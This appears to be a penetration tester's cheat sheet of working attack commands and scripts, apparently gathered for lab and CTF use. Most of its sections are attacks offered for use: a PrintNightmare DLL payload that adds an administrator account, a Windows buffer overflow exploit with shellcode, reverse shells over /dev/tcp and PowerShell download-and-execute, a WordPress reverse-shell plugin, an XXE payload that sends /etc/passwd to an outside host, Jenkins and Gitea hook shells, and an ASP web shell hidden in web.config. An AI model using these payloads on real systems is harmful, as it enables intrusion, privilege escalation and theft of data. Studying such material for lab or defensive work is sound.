msfvenom -p windows/x64/exec CMD='cmd.exe /k "net user /add test123 test123 && net localgroup administrators test123 /add"' EXITFUNC=none -f dll -o payload.dll
./CVE-2021-1675.py bank.local/username:[email protected] 'C:\Users\users\Documents\payload.dll'

# Detect
REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

# References
https://msandbu.org/printnightmare-cve-2021-1675/
https://www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution
https://community.carbonblack.com/t5/Query-Exchange/Finding-Registry-Keys-Used-for-PrintNightmare-CVE-2021-34527/idi-p/105368

=======Setup mona.py=======
# Download mona.py
wget https://raw.githubusercontent.com/corelan/mona/master/mona.py

# Upload into the machine
certutil -URLCache -f http://10.10.10.10/mona.py mona.py

# Put into Immunity Debugger Folder
C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands\mona.py
@
C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands\mona.py

# Run Immunity Debugger and config mona (Make sure run as Administrator)
!mona config -set workingfolder c:\mona\%p

=======Mona Commands=======
# Config Mona
!mona config -set workingfolder c:\mona\%p

# Create bytearray
!mona bytearray -b "\x00" # BadCharacter

# Find Offset with length of pattern created
!mona findmsp -distance 2400

# Compare bad characters with ESP
!mona compare -f C:\mona\binary\bytearray.bin -a 0124FA18 #ESP

# Find the jump point
!mona jmp -r esp -cpb "\x00\x0a" # BadCharacter

=======Fuzzing (fuzzer.py)=======
import socket, time, sys

ip = "192.168.0.195"

port = 31337
timeout = 5
strings = b"A" * 50

while True:
        try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(timeout)
                s.connect((ip,port))
                s.send(strings + b"\r\n")
                print(s.recv(1024))
        except:
                print("Fuzzing crashed at {} bytes".format(len(strings)))
                sys.exit(0)
        strings += b"A" * 50
        time.sleep(1)
		
=======Finding offset=======
msf-pattern_create -l 150 # Create Pattern
!mona findmsp -distance 150 # Mona commands to find offset

# crash.py
import socket, time, sys

ip = "192.168.0.195"
port = 31337

payload = b"<PATTERN HERE>"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
s.send(payload + b"\r\n")
print(s.recv(1024))

# crash2.py
import socket, time, sys

ip = "192.168.0.195"
port = 31337

offset = 146
overflow = b"A" * offset
retrn = b"BBBB"
payload = overflow + retrn

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
s.send(payload + b"\r\n")
print(s.recv(1024))

=======Finding Bad Characters & Jump Point=======
!mona bytearray -b "\x00" # Generate Bytearray
!mona compare -f C:\mona\gatekeeper\bytearray.bin -a 020C19F8  # Check bad character we found
!mona jmp -r esp -cpb  "\x00\x0a" # Find jump point

# badchar.py
print("\t----------------------")
print("\t|    BAD CHARACTER   |")
print("\t----------------------")
print("\n[+] Example No Badchar (Please include \\x00) => Enter Bad Characters: \\x00")
print("[+] Example Got Badchar => Enter Bad Characters: \\x02\\x03\\x04")

INPUTS = raw_input("\n[+] Enter Bad Characters: ")
OUTPUT_INPUTS = r"{0}".format(INPUTS)
LISTREM = INPUTS.split("\\x")
LISTBADCHAR = r""
for x in range(1,256):
        if "{:02x}".format(x) not in LISTREM:
                LISTBADCHAR += r"\x" + "{:02x}".format(x)
print(LISTBADCHAR)

# badchar_check.py
import socket, time, sys

ip = "192.168.0.195"
port = 31337

offset = 146
overflow = b"A" * offset
retrn = b"BBBB"
strings = b"<PUT BADCHAR HERE>"
payload = overflow + retrn + strings

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
s.send(payload + b"\r\n")
print(s.recv(1024))

=======Final=======
# msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=eth0 LPORT=443 -b '\x00\x0a' EXITFUNC=thread -f python -v strings
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -b '\x00\x0a' EXITFUNC=thread -f python -v strings

# exploit.py
import socket, time, sys

ip = "192.168.0.195"
port = 31337

offset = 146
overflow = b"A" * offset
retrn = b"\xc3\x14\x04\x08"
strings =  b""
strings += b"\xbf\xa3\xe1\x47\xc1\xda\xd7\xd9\x74\x24\xf4\x5e"
# <MORE PAYLOAD>
padding =  b"\x90" * 16
payload = overflow + retrn + padding + strings

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
s.send(payload + b"\r\n")
print(s.recv(1024))

=======References=======
https://medium.com/swlh/tryhackme-buffer-overflow-prep-9b2ece17a13c
https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/
https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice.git

# Download
https://github.com/AmIAHuman/CVE-2021-33909

# Usage
gcc exploit.c -o exploit
chmod +x exploit
./exploit

# References
https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909
https://github.com/AmIAHuman/CVE-2021-33909

# Steps
-> Ensure /etc/gshadow is writable
-> Put current user to the sudo group
	* sudo:*::username
-> newgrp sudo (login to sudo group)
-> sudo bash

# References
https://nepcodex.com/2021/10/tranquil-writeup-hackmyvm-walkthrough/

# Commands
python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'

# Checking
python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'

# References
https://github.com/mazen160/struts-pwn

# Moodlescan
https://github.com/inc0d3/moodlescan
python3 moodlescan.py -u http://10.10.10.10/moodle

# Manual Check version
http://10.10.10.10/moodle/composer.lock

# Exploit 3.4.1
https://raw.githubusercontent.com/darrynten/MoodleExploit/master/MoodleExploit.php
-> php MoodleExploit.php url=http://10.10.10.10/moodle user=username pass=password ip=10.10.10.11 port=4444 course=2 debug=true
-> /*{a*/`$_GET[0]`;//{x}}
-> &0=<REVERSE SHELL>

# Wpscan
wpscan --url https://10.10.10.10/blog/ -e u,vp --disable-tls-checks
wpscan --url http://10.10.10.10/blog/ -e u --passwords rockyou.txt
wpscan --url http://10.10.10.10/ --usernames kwheel,bjoel --passwords rockyou.txt

# Location
/wp-content/plugins/

# Default Credentials 
admin:password 
wordpress:wordpress 
root:toor

# Reverse Shell
## Plugins
<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: H0j3n
* Author URI: https://h0j3n.blog/
*/

exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.10.10/443 0>&1'");
?>

- save as shell.php
- zip shell.zip shell.php

# Manual Plugin Fuzing
-> Scraping All Plugins
	-> curl -s -k http://plugins.svn.wordpress.org/ | grep -i href| grep -i li | cut -d"\"" -f2 > plugins.txt

# Plugins Vulnerable
##===CVE-2014-2383===
- /wp-content/plugins/post-pdf-export/images/download-icon.png
- /dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
- https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/

##===CVE-2021-29447===
1. Create evil.dtd
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.4.3.51/?p=%file;'>" >

2. Create payload.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.4.3.51/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

3. Host
php -S 0.0.0.0:80

4. Upload payload.wav to wordpress

5. Look at php server
- https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/

# Download Exploit Here
wget https://raw.githubusercontent.com/TheRealHetfield/exploits/master/nibbleBlog_fileUpload.py

# Commands
#==Manual==
# Step 1:
- Go to http://10.10.10.10/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
- Upload php reverse shell
# Step 2
- Listening
- Go to http://10.10.10.10/nibbleblog/content/private/plugins/my_image/image.php

# Links
- https://www.exploit-db.com/exploits/49125
	* python3 exploit3.py 10.10.10.10 80 "c:\windows\system32\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.11/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.11 -Port 443"
	* python3 exploit3.py 10.10.10.10 80 "C:\Users\kostas\Desktop\nc.exe -e cmd.exe 10.10.10.11 443"
- https://www.exploit-db.com/exploits/39161
	* Change lhost,lport
- https://www.exploit-db.com/exploits/49584
	* Change lhost,lport,rhost,rport (Depends windows version)

=> Scanner
$ 

=> References
$ https://www.itoctopus.com/how-to-quickly-know-the-version-of-any-joomla-website
$ https://www.exploit-db.com/docs/english/22763-guidelines-for-pentesting-a-joomla-based-site.pdf

# Scanner
## drupwn
git clone https://github.com/immunIT/drupwn.git
python3 -m pip install -r requirements.txt
./drupwn --target  http://10.10.10.9/  --mode enum

##droopescan
droopescan scan drupal -u http://10.10.10.9/

# 7.x Exploit
https://www.exploit-db.com/exploits/41564
searchsploit -x php/webapps/44449.rb > exploit.rb
	- ruby exploit.rb http://10.10.10.10./ --verbose

# Download
searchsploit -x php/webapps/18650.py > output.py

# Usage
- Change lport
- Run

# Lfi
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

# SQL Injection
https://www.exploit-db.com/exploits/46635

# Usage
python exploit.py -u http://10.10.10.10/writeup

# Download
git clone https://github.com/noraj/Umbraco-RCE.git

# Usage
python exploit.py -u '[email protected]' -p 'password' -i http://10.10.10.10 -c powershell.exe -a 'whoami'

# Metasploit Module
use multi/http/playsms_uploadcsv_exec

# File Traversal - Better use burpsuite
- http://IP:PORT/<Anything>/../../ThinVnc.ini

# File Upload RCE
https://www.exploit-db.com/exploits/49445

# References
https://www.sourcecodester.com/php/12306/voting-system-using-php.html

# File location
/var/www/osticket/upload/include/ost_config.php

# Wordlists
locate sharepoint | grep txt
/pathto/SecLists/Discovery/Web-Content/CMS/sharepoint.txt
/usr/share/dirb/wordlists/vulns/sharepoint.txt
/usr/share/wfuzz/wordlist/vulns/sharepoint.txt
/usr/share/windows-resources/powersploit/Recon/Dictionaries/sharepoint.txt

# User Enumeration
http://example.com/_layouts/userdisp.aspx?id=1
http://example.com/_layouts/15/userdisp.aspx?id=1
http://example.com/site/path/_layouts/15/userdisp.aspx?id=1
http://example.com/site/path/_layouts/userdisp.aspx?id=1

# Web Services
http://example.com/_vti_bin/spsdisco.aspx

# References
https://hackingprofessional.github.io/HTB/Hacking-a-sharepoint-website/
https://the-infosec.com/2017/04/18/penetration-testing-sharepoint/
https://www.crummie5.club/the-lone-sharepoint/
https://www.mdsec.co.uk/2020/03/a-security-review-of-sharepoint-site-pages/
https://www.defcon.org/images/defcon-11/dc-11-presentations/dc-11-Shannon/presentations/dc-11-shannon.pdf
https://pentest-tools.com/public/sample-reports/sharepoint-scan-sample-report.pdf
https://trojand.com/cheatsheet/Methodologies/Sharepoint.html
http://sparty.secniche.org/
https://hackmag.com/security/sharepoint-serving-the-hacker/
https://github.com/helloitsliam/Hacking/blob/master/SharePoint-URLs
https://github.com/bhasbor/SharePointURLBrute-v1.1/blob/master/SharePoint-UrlExtensions-18Mar2012.txt
https://www.youtube.com/watch?v=aXFnO_PzaIw

# Exploit
https://www.exploit-db.com/exploits/39161
https://www.exploit-db.com/exploits/49584

# Payload (UrlEncode)
# Execute File
?search=%00{.exec%7Cwscript.exe%20//B%20//NOLOGO%20%25TEMP%25%5Cpayload.vbs.}

# Payload (UrlDecode)
# Execute File
?search= {.exec|wscript.exe //B //NOLOGO %TEMP%\payload.vbs.}

# PhreeBooks 5.2.3 ERP - Remote Code Execution
https://www.exploit-db.com/exploits/49524
https://www.exploit-db.com/exploits/46645

# Decrypt
https://github.com/gquere/mRemoteNG_password_decrypt
https://github.com/haseebT/mRemoteNG-Decrypt.git

# Commands
python3 mremoteng_decrypt.py -s "<BASE64>"

# < 1.290
https://www.exploit-db.com/exploits/2017
## Commands
perl exploit.pl 10.10.10.10 10000 /etc/passwd 0

# Bruteforce hydra
hydra -l admin -P rockyou.txt 10.10.10.10 -s 30609 http-post-form 
"/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError"

# Reverse shell (Linux)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

# Location 
/etc/gitea

# Reverse Shell
- Choose one repo
- Go to Git Hooks
- Put reverse shell in contents of Post-receive

#!/bin/bash
bash -i >& /dev/tcp/10.4.3.51/443 0>&1

- git clone, git add . and git commit.

# Database (Change Password)
sqlite3 database.db
select passwd from user;
select passwd_hash_algo from user;
select 

# Database (Change is_admin)
sqlite3 database.db
select id,name,is_admin from user;
update user set is_admin=1 where id=3;

=> Download
$ https://www.exploit-db.com/exploits/50070

=> Commands
$ python3 exploit.py listApps 10.10.10.10
$ python3 exploit.py listFiles 10.10.10.10
$ python3 exploit.py listAppsSdcard 10.10.10.10
$ python3 exploit.py getDeviceInfo 10.10.10.10
$ python3 exploit.py listAppsPhone 10.10.10.10
$ python3 exploit.py listPics 10.10.10.10

=> References
$ https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566

# RCE 
https://www.exploit-db.com/exploits/50239
=> python3 exploit.py http://localhost/

# Laravel Debug RCE (CVE-2021-3129)
https://github.com/zhzyker/CVE-2021-3129
=> python3 exp.py http://localhost:8000/
=> To get reverse shell change `id` to any reverse shell

# crt.sh (@vict0ni)
curl -k -s "https://crt.sh/?q=example&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

# Archive (@pikpikcu)
curl -s "http://web.archive.org/cdx/search/cdx?url=*.example.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

# References
https://reposhub.com/python/learning-tutorial/dwisiswant0-awesome-oneliner-bugbounty.html

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.10.10/Invoke-PowerShellTcp.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->